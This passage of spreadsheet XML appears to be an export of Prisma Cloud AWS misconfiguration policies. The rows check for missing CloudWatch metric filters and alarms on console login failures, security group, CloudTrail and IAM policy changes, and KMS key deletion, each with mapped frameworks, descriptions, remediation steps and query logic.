      <c r="AI2023" t="inlineStr">
        <is>
          <t>a0d2b738-934f-4237-bb5c-78c1a2f42e65</t>
        </is>
      </c>
      <c r="AJ2023" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2023" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2024">
      <c r="A2024"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CIS v1.3.0 (AWS), Fedramp (Moderate), Risk Management in Technology (RMiT), CSA CCM v.4.0.6, PCI DSS v4.0, Australian Energy Sector Cyber Security Framework (AESCSF), Microsoft Cloud Security Benchmark v1, PCI DSS v3.2.1, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, ISO/IEC 27002:2013, ISO/IEC 27017:2015, ITSG-33, CIS v1.4.0 (AWS), Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, CIS v2.0.0 (AWS) - Level 2, MITRE ATT&amp;CK v12, CSA CCM v.4.0.1, CRI Profile v1.2.1, CSA CCM v4.0.12, APRA (CPS 234) Information Security, NYDFS 23 CRR-NY 500.0, MPAA Content Protection Best Practices, ISO/IEC 27002:2013, Copy of ACSC Information Security Manual (ISM)-clone, GDPR, ISO 27002:2022, CDC NIST 800-53 Rev4, HITRUST CSF v.9.6.0, CIS Controls v7.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, CSA CCM v.4.0.6, Copy of CIS Controls v8, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, MTSBv2_AWS, CIS v3.0.0 (AWS) Level 1, ISO/IEC 27017:2015, Microsoft Cloud Security Benchmark v1, ISO/IEC 27017:2015, CIS v2.0.0 (AWS) - Level 1, NIST 800-53 Rev 5, CIS v1.5.0 (AWS) - Level 2, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, PCI DSS v4.0, TX-RAMP Level 1, NIST SP 800-171 Revision 3, NIST CSF, Secure Controls Framework (SCF) - 2022.2.1, CDC NIST 800-53 Rev4, CRI Profile v2.0, CSA CCM v.4.0.1, ISO/IEC 27017:2015, TX-RAMP Level 2, CIS Controls v8, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, CHC HITRUST CSF v.9.6.0, CIS v1.2.0 (AWS), Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, Fedramp (Moderate), NIST 800-53 Rev 5, NIST 800-53 Rev 5, CSA CCM v.4.0.1, CSA CCM v.4.0.1, NIST 800-53 Rev4, Insurance Regulatory And Development Authority Of India, ISO/IEC 27002:2013, CIS Controls v8.1, RBI Baseline Cyber Security and Resilience Requirements, kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, Fedramp (Low), NIST SP 800-171 Revision 3, ISO/IEC 27017:2015, Fedramp (Low), ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, CIS v3.0.0 (AWS) Level 2,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CSA CCM v4.0.12, PCI DSS v4.0, Matt's ATT&amp;ACK, ISO/IEC 27002:2013,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t>
        </is>
      </c>
      <c r="B2024" s="2" t="inlineStr">
        <is>
          <t>REVIEW</t>
        </is>
      </c>
      <c r="C2024" s="2" t="inlineStr"/>
      <c r="D2024" t="n">
        <v>0</v>
      </c>
      <c r="E2024" t="n">
        <v>0</v>
      </c>
      <c r="F2024" t="n">
        <v>54</v>
      </c>
      <c r="G2024" t="b">
        <v>1</v>
      </c>
      <c r="H20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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2024" t="inlineStr">
        <is>
          <t>aws-logs</t>
        </is>
      </c>
      <c r="K2024" t="inlineStr">
        <is>
          <t>AWS Log metric filter and alarm does not exist for AWS management console authentication failures</t>
        </is>
      </c>
      <c r="L2024" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2024" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2024" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2024" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2024" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2024" t="inlineStr">
        <is>
          <t>Guidelines for System Monitoring</t>
        </is>
      </c>
      <c r="R2024" t="inlineStr">
        <is>
          <t>ISM-1228</t>
        </is>
      </c>
      <c r="S2024" t="inlineStr"/>
      <c r="T2024" t="b">
        <v>0</v>
      </c>
      <c r="U2024" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2024" t="inlineStr">
        <is>
          <t>aws-logs-describe-metric-filters</t>
        </is>
      </c>
      <c r="W2024" t="inlineStr">
        <is>
          <t>This policy identifies the AWS accounts which do not have a log metric filter and alarm for AWS management console authentication failures. Monitoring failed console logins may decrease lead time to detect an attempt to brute force a credential, which may provide an indicator, such as source IP, that can be used in other event correlation. It is recommended that a metric filter and alarm be established for failed console authentication attempts.
NOTE: This policy will trigger alert if you have at least one Cloudtrail with the multi trial is enabled, Logs all management events and is not set with specific log metric filter and alarm in your account.</t>
        </is>
      </c>
      <c r="X2024"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ConsoleLogin) &amp;&amp; ($.errorMessage = "Failed authentication")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4" t="inlineStr"/>
      <c r="Z2024"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ConsoleLogin and ($.X.filterPattern contains "errorMessage=" or $.X.filterPattern contains "errorMessage =") and ($.X.filterPattern does not contain "errorMessage!=" and $.X.filterPattern does not contain "errorMessage !=") and $.X.filterPattern contains "Failed authentication") and ($.X.metricTransformations[*] contains $.Y.metricName))'; show X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA2024" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2024" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2024" t="inlineStr">
        <is>
          <t>PC-AWS-CWT-502</t>
        </is>
      </c>
      <c r="AD2024" t="b">
        <v>1</v>
      </c>
      <c r="AE2024" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2024" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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4" t="inlineStr">
        <is>
          <t>2568d866-2a59-4246-83fd-3c2ab3e1cf92</t>
        </is>
      </c>
      <c r="AI2024" t="inlineStr">
        <is>
          <t>ff90cb07-c071-4cd8-999a-02b976cd2532</t>
        </is>
      </c>
      <c r="AJ2024" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2024" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2025">
      <c r="A2025" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1, NYDFS 23 CRR-NY 500.0, Insurance Regulatory And Development Authority Of India, Microsoft Cloud Security Benchmark v1, Microsoft Cloud Security Benchmark v1, Microsoft Cloud Security Benchmark v1, NIST 800-53 Rev 5, Secure Controls Framework (SCF) - 2024.2, CIS v3.0.0 (AWS) Level 2, Secure Controls Framework (SCF) - 2024.2, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, CSA CCM v4.0.12, CIS v2.0.0 (AWS) - Level 2</t>
        </is>
      </c>
      <c r="B2025" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2025" s="2" t="inlineStr"/>
      <c r="D2025" t="inlineStr"/>
      <c r="E2025" t="inlineStr"/>
      <c r="F2025" t="inlineStr"/>
      <c r="G2025" t="b">
        <v>1</v>
      </c>
      <c r="H20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25" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2025" t="inlineStr">
        <is>
          <t>aws-logs</t>
        </is>
      </c>
      <c r="K2025" t="inlineStr">
        <is>
          <t>AWS Log metric filter and alarm does not exist for AWS Security group changes</t>
        </is>
      </c>
      <c r="L2025" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2025" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2025" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2025" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2025" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2025" t="inlineStr">
        <is>
          <t>Monitoring</t>
        </is>
      </c>
      <c r="R2025" t="inlineStr">
        <is>
          <t>4.10</t>
        </is>
      </c>
      <c r="S2025" t="inlineStr"/>
      <c r="T2025" t="b">
        <v>0</v>
      </c>
      <c r="U2025" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2025" t="inlineStr">
        <is>
          <t>aws-logs-describe-metric-filters</t>
        </is>
      </c>
      <c r="W2025" t="inlineStr">
        <is>
          <t>This policy identifies the AWS regions that do not have a log metric filter and alarm for security group changes.
Security groups act as virtual firewalls that control inbound and outbound traffic to AWS resources. If changes to these groups go unmonitored, it could result in unauthorized access or expose sensitive data to the public internet.
It is recommended to create a metric filter and alarm for security group changes to promptly detect and respond to any unauthorized modifications, thereby maintaining the integrity and security of your AWS environment.
NOTE: This policy will trigger an alert if you have at least one Cloudtrail with the multi-trail enabled, Logs all management events in your account, and is not set with a specific log metric filter and alarm.</t>
        </is>
      </c>
      <c r="X2025" t="inlineStr">
        <is>
          <t>1. Sign in to the AWS Console.
2. Navigate to the CloudWatch dashboard.
3. Click on 'Log groups' in the 'Logs' section (Left panel)
4. Select the log group created for your CloudTrail trail event logs (Cloudtrail should be multi-trail enabled with all Management Events captured) and click the Actions Dropdown Button -&gt; Click 'Create Metric Filter' button.
5. In the 'Define Pattern' page, add the 'Filter pattern' value as
{ ($.eventName = AuthorizeSecurityGroupIngress) ||
($.eventName = AuthorizeSecurityGroupEgress) || ($.eventName =
RevokeSecurityGroupIngress) || ($.eventName = RevokeSecurityGroupEgress) ||
($.eventName = CreateSecurityGroup) || ($.eventName = DeleteSecurityGroup) }
and Click on 'NEXT'.
6. In the 'Assign Metric' page, Choose Filter Name, and Metric Details parameter according to your requirement and click on 'Next'.
7. Under the ‘Review and Create' page, Review the details and click 'Create Metric Filter’.
8. To create an alarm based on a log group-metric filter, Refer to the below link 
    https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/Create_alarm_log_group_metric_filter.html</t>
        </is>
      </c>
      <c r="Y2025" t="inlineStr"/>
      <c r="Z2025"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AuthorizeSecurityGroupIngress and $.X.filterPattern contains AuthorizeSecurityGroupEgress and $.X.filterPattern contains RevokeSecurityGroupIngress and $.X.filterPattern contains RevokeSecurityGroupEgress and $.X.filterPattern contains CreateSecurityGroup and $.X.filterPattern contains DeleteSecurityGroup) and ($.X.metricTransformations[*] contains $.Y.metricName))'; show X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA2025" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2025" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2025" t="inlineStr">
        <is>
          <t>PC-AWS-CWT-1214</t>
        </is>
      </c>
      <c r="AD2025" t="b">
        <v>1</v>
      </c>
      <c r="AE2025" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2025" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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25" t="inlineStr">
        <is>
          <t>eebf2dd3-69dd-4e08-b450-6092f21d164c</t>
        </is>
      </c>
      <c r="AI2025" t="inlineStr">
        <is>
          <t>c3abeadc-c513-475f-9284-2060418ec057</t>
        </is>
      </c>
      <c r="AJ2025" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2025" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2026">
      <c r="A2026" t="inlineStr">
        <is>
          <t>jneytchev-fedramp-low, Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, MPAA Content Protection Best Practices, APRA (CPS 234) Information Security, MLPS 2.0 (Level 2), ISO/IEC 27002:2013, CIS v1.3.0 (AWS), kfirdaus AWS Account-CS, MLPS 2.0 (Level 2),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CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, wells fargo CIS v1.5.0 (AWS) - Level 1, MITRE ATT&amp;CK v12, CSA CCM v.4.0.1, CRI Profile v1.2.1, CSA CCM v4.0.12, APRA (CPS 234) Information Security, CIS v2.0.0 (AWS) - Level 1, NYDFS 23 CRR-NY 500.0, MPAA Content Protection Best Practices, MTSBv2_AWS, ISO/IEC 27002:2013, Copy of ACSC Information Security Manual (ISM)-clone, GDPR, ISO 27002:2022, CDC NIST 800-53 Rev4, HITRUST CSF v.9.6.0, CIS Controls v7.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, CSA CCM v.4.0.6, Copy of CIS Controls v8, Insurance Regulatory And Development Authority Of India, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, FFIEC, Telecommunications Security Act - TSA, ISO/IEC 27017:2015, Microsoft Cloud Security Benchmark v1, ISO/IEC 27017:2015, Telecommunications Security Act - TSA, NIST 800-53 Rev 5, CIS v1.4.0 (AWS), Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, PCI DSS v4.0, TX-RAMP Level 1, NIST SP 800-171 Revision 3, NIST CSF, Secure Controls Framework (SCF) - 2022.2.1, CDC NIST 800-53 Rev4, CRI Profile v2.0, CSA CCM v.4.0.1, ISO/IEC 27017:2015, TX-RAMP Level 2, CIS Controls v8, CIS v1.5.0 (AWS) - Level 1,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NIST CSF, CSA CCM v.4.0.1, jneytchev-fedramp-low, Demo_Daryl ACSC Information Security Manual (ISM), CIS v3.0.0 (AWS) Level 1, CIS Controls v8.1, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2022.2.1, Risk Management in Technology (RMiT), MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, ACSC Information Security Manual (ISM), NIST 800-53 Rev4, CRI Profile v2.0, CSA CCM v.4.0.1, FFIEC,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CIS v1.2.0 (AWS),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Telecommunications Security Act - TSA, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27001:2022, FFIEC, NIST SP 800-172, CSA CCM v.4.0.1, Australian Energy Sector Cyber Security Framework (AESCSF), ISO/IEC 27018:2019, NIST 800-53 Rev4, CSA CCM v.4.0.1, NIST CSF v2.0, ISO/IEC 27018:2019, NIST CSF, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B2026" s="2" t="inlineStr">
        <is>
          <t>REVIEW</t>
        </is>
      </c>
      <c r="C2026" s="2" t="inlineStr"/>
      <c r="D2026" t="n">
        <v>0</v>
      </c>
      <c r="E2026" t="n">
        <v>0</v>
      </c>
      <c r="F2026" t="n">
        <v>54</v>
      </c>
      <c r="G2026" t="b">
        <v>1</v>
      </c>
      <c r="H20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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2026" t="inlineStr">
        <is>
          <t>aws-logs</t>
        </is>
      </c>
      <c r="K2026" t="inlineStr">
        <is>
          <t>AWS Log metric filter and alarm does not exist for CloudTrail configuration changes</t>
        </is>
      </c>
      <c r="L2026" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2026" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2026" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2026" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2026" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2026" t="inlineStr">
        <is>
          <t>Guidelines for System Monitoring</t>
        </is>
      </c>
      <c r="R2026" t="inlineStr">
        <is>
          <t>ISM-1228</t>
        </is>
      </c>
      <c r="S2026" t="inlineStr"/>
      <c r="T2026" t="b">
        <v>0</v>
      </c>
      <c r="U2026" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2026" t="inlineStr">
        <is>
          <t>aws-logs-describe-metric-filters</t>
        </is>
      </c>
      <c r="W2026" t="inlineStr">
        <is>
          <t>This policy identifies the AWS regions which do not have a log metric filter and alarm for CloudTrail configuration changes. Monitoring changes to CloudTrail's configuration will help ensure sustained visibility to activities performed in the AWS account. It is recommended that a metric filter and alarm be established for detecting changes to CloudTrail's configurations.
NOTE: This policy will trigger alert if you have at least one Cloudtrail with the multi trial is enabled, Logs all management events in your account and is not set with specific log metric filter and alarm.</t>
        </is>
      </c>
      <c r="X2026"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CreateTrail) || ($.eventName = UpdateTrail) || ($.eventName = DeleteTrail) || ($.eventName = StartLogging) || ($.eventName = StopLogging)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6" t="inlineStr"/>
      <c r="Z2026"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CreateTrail and $.X.filterPattern contains UpdateTrail and $.X.filterPattern contains DeleteTrail and $.X.filterPattern contains StartLogging and $.X.filterPattern contains StopLogging) and ($.X.metricTransformations[*] contains $.Y.metricName))'; show X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA2026" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2026" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2026" t="inlineStr">
        <is>
          <t>PC-AWS-CWT-505</t>
        </is>
      </c>
      <c r="AD2026" t="b">
        <v>1</v>
      </c>
      <c r="AE2026" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2026" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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6" t="inlineStr">
        <is>
          <t>528da278-3505-405c-8548-0555dafec3b3</t>
        </is>
      </c>
      <c r="AI2026" t="inlineStr">
        <is>
          <t>69be8fd2-04c7-4bdc-aabb-2903fd9a1a73</t>
        </is>
      </c>
      <c r="AJ2026" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2026" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2027">
      <c r="A2027" t="inlineStr">
        <is>
          <t>jneytchev-fedramp-low, Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, CIS v1.3.0 (AWS), MPAA Content Protection Best Practices, APRA (CPS 234) Information Security, MLPS 2.0 (Level 2), ISO/IEC 27002:2013, kfirdaus AWS Account-CS, MLPS 2.0 (Level 2),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TX-RAMP Level 2, APRA (CPS 234) Information Security, NYDFS 23 CRR-NY 500.0, MPAA Content Protection Best Practices, ISO/IEC 27002:2013, Copy of ACSC Information Security Manual (ISM)-clone, GDPR, ISO 27002:2022, CDC NIST 800-53 Rev4, HITRUST CSF v.9.6.0, CIS Controls v7.1, ISO/IEC 27002:2013, Microsoft Cloud Security Benchmark v1, Microsoft Cloud Security Benchmark v1, CSA CCM v.4.0.1, CSA CCM v4.0.12, CSA CCM v.4.0.6, Copy of CIS Controls v8, Insurance Regulatory And Development Authority Of India, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, ISO/IEC 27017:2015, Microsoft Cloud Security Benchmark v1, ISO/IEC 27017:2015, CIS v2.0.0 (AWS) - Level 1, NIST 800-53 Rev 5, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, PCI DSS v4.0, TX-RAMP Level 1, NIST SP 800-171 Revision 3, NIST CSF, Secure Controls Framework (SCF) - 2022.2.1, CIS v3.0.0 (AWS) Level 1, CDC NIST 800-53 Rev4, Secure Controls Framework (SCF) - 2024.2, CRI Profile v2.0, CSA CCM v.4.0.1, ISO/IEC 27017:2015, TX-RAMP Level 2, CIS Controls v8,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HIPAA, CSA CCM v.4.0.1, kashan ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, CSA CCM v.4.0.1, Secure Controls Framework (SCF) - 2024.2, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, wells fargo CIS v1.5.0 (AWS) - Level 1, ISO/IEC 27002:2013, PCI DSS v4.0, CIS v1.4.0 (AWS),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CIS v1.2.0 (AWS), ISO/IEC 27001:2022, CIS v1.5.0 (AWS) - Level 1, NIST SP 800-172, CSA CCM v.4.0.1, Australian Energy Sector Cyber Security Framework (AESCSF), ISO/IEC 27018:2019, NIST 800-53 Rev4, CSA CCM v.4.0.1, NIST CSF v2.0, ISO/IEC 27018:2019, NIST CSF, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), CSA CCM v.4.0.1, MTSBv2_AWS, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B2027" s="2" t="inlineStr">
        <is>
          <t>REVIEW</t>
        </is>
      </c>
      <c r="C2027" s="2" t="inlineStr"/>
      <c r="D2027" t="n">
        <v>0</v>
      </c>
      <c r="E2027" t="n">
        <v>0</v>
      </c>
      <c r="F2027" t="n">
        <v>55</v>
      </c>
      <c r="G2027" t="b">
        <v>1</v>
      </c>
      <c r="H20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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2027" t="inlineStr">
        <is>
          <t>aws-logs</t>
        </is>
      </c>
      <c r="K2027" t="inlineStr">
        <is>
          <t>AWS Log metric filter and alarm does not exist for IAM policy changes</t>
        </is>
      </c>
      <c r="L2027" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2027" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2027" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2027" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2027" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2027" t="inlineStr">
        <is>
          <t>Monitoring</t>
        </is>
      </c>
      <c r="R2027" t="inlineStr">
        <is>
          <t>4.4</t>
        </is>
      </c>
      <c r="S2027" t="inlineStr"/>
      <c r="T2027" t="b">
        <v>0</v>
      </c>
      <c r="U2027" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2027" t="inlineStr">
        <is>
          <t>aws-logs-describe-metric-filters</t>
        </is>
      </c>
      <c r="W2027" t="inlineStr">
        <is>
          <t>This policy identifies the AWS regions which do not have a log metric filter and alarm for IAM policy changes. Monitoring changes to IAM policies will help ensure authentication and authorization controls remain intact. It is recommended that a metric filter and alarm be established changes made to Identity and Access Management (IAM) policies.
NOTE: This policy will trigger alert if you have at least one Cloudtrail with the multi trial is enabled, Logs all management events in your account and is not set with specific log metric filter and alarm.</t>
        </is>
      </c>
      <c r="X2027"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7" t="inlineStr"/>
      <c r="Z2027"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DeleteGroupPolicy and $.X.filterPattern contains DeleteRolePolicy and $.X.filterPattern contains DeleteUserPolicy and $.X.filterPattern contains PutGroupPolicy and $.X.filterPattern contains PutRolePolicy and $.X.filterPattern contains PutUserPolicy and $.X.filterPattern contains CreatePolicy and $.X.filterPattern contains DeletePolicy and $.X.filterPattern contains CreatePolicyVersion and $.X.filterPattern contains DeletePolicyVersion and $.X.filterPattern contains AttachRolePolicy and $.X.filterPattern contains DetachRolePolicy and $.X.filterPattern contains AttachUserPolicy and $.X.filterPattern contains DetachUserPolicy and $.X.filterPattern contains AttachGroupPolicy and $.X.filterPattern contains DetachGroupPolicy) and ($.X.metricTransformations[*] contains $.Y.metricName))'; show X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA2027" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2027" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2027" t="inlineStr">
        <is>
          <t>PC-AWS-CWT-504</t>
        </is>
      </c>
      <c r="AD2027" t="b">
        <v>1</v>
      </c>
      <c r="AE2027" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2027" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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7" t="inlineStr">
        <is>
          <t>84ff41af-e3f2-406e-8282-962d6413fd28</t>
        </is>
      </c>
      <c r="AI2027" t="inlineStr">
        <is>
          <t>0c4e30cb-16d6-4ec2-be19-41bd63577ade</t>
        </is>
      </c>
      <c r="AJ2027" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2027" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2028">
      <c r="A2028" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1, jneytchev-fedramp-low, Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, MPAA Content Protection Best Practices, APRA (CPS 234) Information Security, MLPS 2.0 (Level 2), ISO/IEC 27002:2013, CSA CCM v4.0.12, kfirdaus AWS Account-CS, MLPS 2.0 (Level 2), Fedramp (Moderate), Risk Management in Technology (RMiT), CSA CCM v.4.0.6, CIS v1.3.0 (AWS),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CIS v1.4.0 (AWS), APRA (CPS 234) Information Security, NYDFS 23 CRR-NY 500.0, MPAA Content Protection Best Practices, ISO/IEC 27002:2013, Copy of ACSC Information Security Manual (ISM)-clone, GDPR, ISO 27002:2022, CDC NIST 800-53 Rev4, HITRUST CSF v.9.6.0, CIS Controls v7.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, CSA CCM v.4.0.6, Copy of CIS Controls v8, ISO/IEC 27001:2022, CIS v1.5.0 (AWS) - Level 2, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, MTSBv2_AWS, ISO/IEC 27017:2015, Microsoft Cloud Security Benchmark v1, ISO/IEC 27017:2015, CIS v2.0.0 (AWS) - Level 2, NIST 800-53 Rev 5, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, TX-RAMP Level 1, NIST SP 800-171 Revision 3, NIST CSF, Secure Controls Framework (SCF) - 2022.2.1, CDC NIST 800-53 Rev4, Secure Controls Framework (SCF) - 2024.2, CRI Profile v2.0, CSA CCM v.4.0.1, ISO/IEC 27017:2015, TX-RAMP Level 2, CIS Controls v8, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, CHC HITRUST CSF v.9.6.0, PCI DSS v4.0,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CSA CCM v.4.0.1, CIS v1.2.0 (AWS), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), SOC 2, NIST CSF v2.0, APRA (CPS 234) Information Security, HIPAA, ISO/IEC 27002:2013, SOC 2, NIST SP 800-171 Revision 2, kfirdaus AWS Account-CS, CSA CCM v.4.0.1, CSA CCM v.4.0.6, ISO/IEC 27017:2015, CDC NIST 800-53 Rev4,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Matt's ATT&amp;ACK, ISO/IEC 27002:2013, DORA,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 CIS v3.0.0 (AWS) Level 2</t>
        </is>
      </c>
      <c r="B2028" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2028" s="2" t="inlineStr"/>
      <c r="D2028" t="inlineStr"/>
      <c r="E2028" t="inlineStr"/>
      <c r="F2028" t="inlineStr"/>
      <c r="G2028" t="b">
        <v>1</v>
      </c>
      <c r="H20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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2028" t="inlineStr">
        <is>
          <t>aws-logs</t>
        </is>
      </c>
      <c r="K2028" t="inlineStr">
        <is>
          <t>AWS Log metric filter and alarm does not exist for disabling or scheduled deletion of customer created CMKs</t>
        </is>
      </c>
      <c r="L2028" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2028" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2028" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2028" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2028" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2028" t="inlineStr">
        <is>
          <t>Guidelines for System Monitoring</t>
        </is>
      </c>
      <c r="R2028" t="inlineStr">
        <is>
          <t>ISM-1228</t>
        </is>
      </c>
      <c r="S2028" t="inlineStr"/>
      <c r="T2028" t="b">
        <v>0</v>
      </c>
      <c r="U2028" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2028" t="inlineStr">
        <is>
          <t>aws-logs-describe-metric-filters</t>
        </is>
      </c>
      <c r="W2028" t="inlineStr">
        <is>
          <t>This policy identifies the AWS regions which do not have a log metric filter and alarm for disabling or scheduled deletion of customer created CMKs. Data encrypted with disabled or deleted keys will no longer be accessible. It is recommended that a metric filter and alarm be established for customer created CMKs which have changed state to disabled or scheduled deletion.
NOTE: This policy will trigger alert if you have at least one Cloudtrail with the multi trial is enabled, Logs all management events in your account and is not set with specific log metric filter and alarm.</t>
        </is>
      </c>
      <c r="X2028"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($.eventSource = kms.amazonaws.com) &amp;&amp; (($.eventName=DisableKey)||($.eventName=ScheduleKeyDeletion))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8" t="inlineStr"/>
